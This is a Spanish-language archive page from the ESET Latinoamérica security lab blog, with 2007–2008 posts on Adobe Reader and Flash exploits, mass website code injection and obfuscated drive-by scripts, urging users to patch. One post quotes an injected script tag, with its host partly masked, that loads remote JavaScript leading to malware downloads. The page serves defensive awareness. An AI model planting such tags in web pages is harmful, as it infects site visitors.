ESET Latinoamérica - Laboratorio

Archivo para la Categoria 'Vulnerabilidades'

Vulnerabilidad (otra vez) de Adobe Reader

Junio 25, 2008 10:29 am

Una vez más Adobe Reader es vulnerable a un error no especificado y que se está aprovechando para difundir malware.

El caso es semejante al que ya comentamos en malware en archivos PDF y al mostrado en nuestro Video Educativo sobre infección en archivos PDF. Por supuesto, la recomendación es la misma de antes: actualizar lo más pronto posible a Adobe Reader versión 8.1.2 Security Update 1.

Otra alternativa es abrir Adobe Reader y hacer que el programa busque las actualizaciones disponibles, tal y como se muestra en nuestro video o en esta imagen:

Actualizar Adobe Reader

De esta forma, se evitará ser víctima de la descarga de un malware a través de la ejecución de archivos PDF modificados para tal fin.

Cristian

Agregar a del.icio.us Agregar a Digg Agregar a Technorati Agregar a Furl Agregar a Meneame

Archivos Flash en peligro (actualización)

Junio 1, 2008 1:12 pm

Tal y como lo habíamos anunciado desde nuestro Laboratorio, Adobe acaba de confirmar que la versión Flash Player 9.0.124.0 no es vulnerable a este exploit por lo que debe procederse a actualizar inmediatamente.

Nos enorgullece haber sido una de las primeras compañias que protegió e informó al usuario de esta amenaza. Actualmente los archivos dañinos siguen siendo identificadas y además el exploit es identificado por ESET NOD32 como SWF/Exploit.CVE-2007-0071 por lo que cualquier amenaza que aparezca en el futuro, explotando esta vulnerabilidad, será bloqueada.

Detección malware Flash

Cristian

Agregar a del.icio.us Agregar a Digg Agregar a Technorati Agregar a Furl Agregar a Meneame

Archivos Flash en peligro

Mayo 28, 2008 9:27 pm

Se han reportado gran cantidad de sitios que, aprovechando una vulnerabilidad en Flash Player de la empresa Adobe, descargan e instalan malware en el equipo del usuario. Esta vulnerabilidad, un desbordamiento de buffer, permite ejecutar scripts en el equipo del usuario y la posterior descarga de códigos dañinos.

Adobe, luego de su investigación, ha catalogado a esta vulnerabilidad como crítica y que solo afectaría (aún en investigación) a las versiones de Flash Player anteriores a la última versión Flash Player 9.0.124.0 por lo que es recomendable:

En este momento, ESET NOD32 detecta los archivos Flash maliciosos como SWF/TrojanDownloader.Swif.C y las amenazas descargadas como gusano Jalous o como troyano TrojanDownloader.Psyme.

Detección malware Flash

Como siempre mencionamos, los creadores de malware se valen de muchas herramientas y la falta de actualización del sistema operativo y de las aplicaciones, por parte del usuario, es una de ellas. Recuerde que actualizar todas las aplicaciones es fundamental.

Actualización 01/06/2008

Cristian

Agregar a del.icio.us Agregar a Digg Agregar a Technorati Agregar a Furl Agregar a Meneame

Las inyecciones de códigos maliciosos en las webs se hacen cada vez más comunes

12:21 am

Durante esta madrugada, nuestro laboratorio detectó otro caso donde varios miles de sitios web fueron modificados por atacantes para inyectar códigos maliciosos en sus páginas.

En esta oportunidad, se inyecta una línea como la siguiente en el sitio web vulnerable:

<script src=http://www.ch****.com/reg.js></script>

Ese archivo contiene código JavaScript que crea una etiqueta iFrame en el sitio web, la cual apunta a otro script, en este caso VBScript, que ESET NOD32 Antivirus detecta como VBS/TrojanDownloader.Iframe.NAA, que luego descarga otros tantos códigos maliciosos aprovechando una vulnerabilidad existente en el componente ActiveX de MDAC de Windows.

Esta vulnerabilidad está documentada en el siguiente enlace:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0003

La misma puede ser parcheada con la actualización disponible aquí:

http://www.microsoft.com/technet/security/bulletin/ms06-014.mspx

La inyección de códigos maliciosos en sitios webs tradicionales, aprovechando vulnerabilidades en estos últimos, es una técnica cada vez más usada en estos días, como hemos reportado aquí en varias oportunidades.

Como siempre, recomendamos que mantengan sus antivirus actualizados y con las capacidades de detección heurística activadas a fin de mantenerse protegidos contra estas amenazas que aparecen a diario.

En cuanto a los administradores de sitios web, es importante que mantengan actualizado el software que utilizan tanto para su servidor como el sitio en si mismo, y que apliquen prácticas de programación segura para evitar las inyecciones de código.

Franco

Agregar a del.icio.us Agregar a Digg Agregar a Technorati Agregar a Furl Agregar a Meneame

Vulnerabilidad en Adobe Reader permite descargar malware

Febrero 12, 2008 9:46 am

Días atrás Adobe lanzó la actualización 8.1.2 de su producto más conocido: el lector de archivos PDF, Adobe Reader. En ese momento, Adobe no dió detalles de las 26 correcciones realizadas e incluso al momento de escribir esto, la actualización en castellano (sí la de inglés) aún no se encuentra disponible para descargar automáticamente y debe actualizarse a la nueva versión 8.1.2 manualmente desde el sitio de Adobe.

Luego de un pequeño análisis de la actualización realizada por Adobe, se puede llegar a la conclusión que estas vulnerabilidades son críticas porque permiten la ejecución de código Javascript en el sistema del usuario, permitiendo que, por ejemplo, se pueda descargar y ejecutar malware en el mismo.

Esto es lo que ha estado sucediendo desde hace unos días y los Adobe Reader no actualizados han estado siendo aprovechados para instalar diversos tipos de malware como KillAV o Zonebac o gusanos de la vieja familia Bagle (profundamente analizado por ESET).

Sin importar el malware descargado y que se sabe que puede cambiar en cualquier momento, lo importante es:

  • Para los productos antivirus, detectar la explotación de la vulnerabilidad para cortar la cadena de infección desde el primer momento. Es por ello que ESET NOD32 detecta este exploit como PDF/Exploit.Pidief.A. Gracias a esta detección, no importa el código dañino que se intente descargar debido a que dicha descarga nunca sucederá.
  • Para el usuario, es fundamental actualizar su Adobe Reader a la versión mencionada o bien utilizar un producto alternativo para la lectura de archivos PDF.

Actualización 27/02/2008: acabamos de publicar un video educativo sobre el funcionamiento de esta vulnerabilidad y la forma de evitar ser infectado.

Cristian

Agregar a del.icio.us Agregar a Digg Agregar a Technorati Agregar a Furl Agregar a Meneame

Estadísticas de malware, phishing y spam

Noviembre 8, 2007 12:48 pm

IBM Internet Security Systems nació en 1994 y desde entonces se ha transformado en uno de los referentes obligados a la hora de estudiar amenazas en Internet.

En agosto ISS ha publicado completos informes sobre tendencias y estadísticas de vulnerabilidades, malware, phishing y spam, los cuales dejo para su evaluación.

En los informe se destaca la proliferación de ataques que explotan vulnerabilidades no parcheadas en los sistemas, el crecimiento del robo de información confidencial para efectuar fraudes y el phishing como una práctica normal y corriente.

En la siguiente imagen, por ejemplo, puede verse lo remarcamos desde ESET Latinoamérica desde hace tiempo: el crecimiento desmedido de los troyanos y gusanos como herramienta de los delincuentes informáticos.

Estadisticas de malware

Espero disfruten de los informes.

Cristian

Agregar a del.icio.us Agregar a Digg Agregar a Technorati Agregar a Furl Agregar a Meneame

Ejecución transparente de códigos maliciosos

Septiembre 20, 2007 1:16 pm

Numerosos tipos de códigos maliciosos poseen la capacidad de infectar un equipo informático con el solo hecho de visitar una página web. Si señor, con la simple acción de visitar un sitio en Internet, es posible que creadores de malware comprometan nuestra computadora con alguna de sus creaciones.

Pero… ¿cómo puede ser posible? Bueno, los programadores malintencionados buscan constantemente desarrollar técnicas que permitan evadir las aplicaciones de seguridad o por lo menos, dificultar su análisis y detección.

Tal vez, muchos lectores hayan notado en más de una oportunidad que cuando ingresan a determinadas páginas web, estas tardan en cargarse y vemos que la barra de progreso se “estanca” en la mitad de la carga. Esto puede ser un indicio de que, en ese preciso momento, nuestra computadora estaría siendo víctima de un intento de infección.

Este tipo de páginas contienen dentro del código HTML un script malicioso que se encarga de descargar (e incluso ejecutar), por lo general, un troyano. Este script generalmente se encuentra “protegido” con una técnica que recibe el nombre de ofuscación.

Con esta técnica, se busca dificultar al máximo la lectura y/o análisis del código haciendo que sea lo más ilegible posible. En la siguiente captura podemos observar un ejemplo de cómo se ve un código ofuscado dentro de una página web.

Script ofuscado

En la imagen podemos apreciar que se utilizaron dos lenguajes para crear el script: JavaScript y VBScript. Además, también se observan los archivos ejecutables (el malware) que se copia y ejecuta respectivamente al momento de ingresar a una página que contiene inyectado este código ofuscado.

Se pueden encontrar codificados con diferentes metodologías pero básicamente se lo ve más o menos de la misma manera. Aquí tienen otro ejemplo:

Otro ejemplo de script ofuscado

La idea de dificultar el análisis de debe a que a través del ofuscamiento se esconde generalmente un exploit que aprovecha alguna vulnerabilidad de nuestro sistema operativo o aplicación instalada. De aquí la importancia de mantener al día las actualizaciones de nuestro equipo y antivirus.

Estos casos conforman buenos ejemplos para que dejemos de hacer clic, por ejemplo, sobre los enlaces que nos llegan a través de programas de mensajería instantánea o a través del correo electrónico no deseado.

Después de esta lectura ¿quedará algún lector sin actualizar su sistema operativo?

El éxito de este tipo de técnicas, depende en gran medida de nosotros, los usuarios. Somos nosotros mismos una especie de gran antivirus que, al igual que este tipo de programas, en la medida en que no nos mantengamos actualizados e informados, estaremos facilitando la entrada de estas amenazas a nuestro sistema.

Jorge

Agregar a del.icio.us Agregar a Digg Agregar a Technorati Agregar a Furl Agregar a Meneame